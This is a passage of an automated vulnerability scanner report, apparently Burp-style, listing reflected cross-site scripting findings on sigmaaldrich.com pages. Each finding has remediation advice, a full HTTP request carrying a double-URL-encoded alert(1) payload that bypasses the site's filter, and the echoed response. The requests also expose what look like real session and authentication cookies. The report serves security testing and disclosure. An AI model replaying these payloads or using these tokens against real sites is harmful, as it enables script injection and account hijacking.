bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:45 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science43b7f";alert(1)//55e6c486fe4/nanomaterials.html","E404") ;
   </script>
...[SNIP]...

1.595. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanomaterials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bc9f%2522%253balert%25281%2529%252f%252f37a261964dd was submitted in the REST URL parameter 2. This input was echoed as 9bc9f";alert(1)//37a261964dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/9bc9f%2522%253balert%25281%2529%252f%252f37a261964dd HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:47 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/9bc9f";alert(1)//37a261964dd","E404") ;
   </script>
...[SNIP]...

1.596. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanotechnology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb39c%2522%253balert%25281%2529%252f%252f62ffd01fc59 was submitted in the REST URL parameter 1. This input was echoed as eb39c";alert(1)//62ffd01fc59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceeb39c%2522%253balert%25281%2529%252f%252f62ffd01fc59/nanotechnology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceeb39c";alert(1)//62ffd01fc59/nanotechnology.html","E404") ;
   </script>
...[SNIP]...

1.597. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanotechnology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b27e5%2522%253balert%25281%2529%252f%252f3a3fdeb40e2 was submitted in the REST URL parameter 2. This input was echoed as b27e5";alert(1)//3a3fdeb40e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/b27e5%2522%253balert%25281%2529%252f%252f3a3fdeb40e2 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/b27e5";alert(1)//3a3fdeb40e2","E404") ;
   </script>
...[SNIP]...

1.598. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/organic-electronics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8ef8%2522%253balert%25281%2529%252f%252f3614c459a1c was submitted in the REST URL parameter 1. This input was echoed as b8ef8";alert(1)//3614c459a1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceb8ef8%2522%253balert%25281%2529%252f%252f3614c459a1c/organic-electronics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceb8ef8";alert(1)//3614c459a1c/organic-electronics.html","E404") ;
   </script>
...[SNIP]...

1.599. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/organic-electronics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198bd%2522%253balert%25281%2529%252f%252fcca3778b57c was submitted in the REST URL parameter 2. This input was echoed as 198bd";alert(1)//cca3778b57c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/198bd%2522%253balert%25281%2529%252f%252fcca3778b57c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


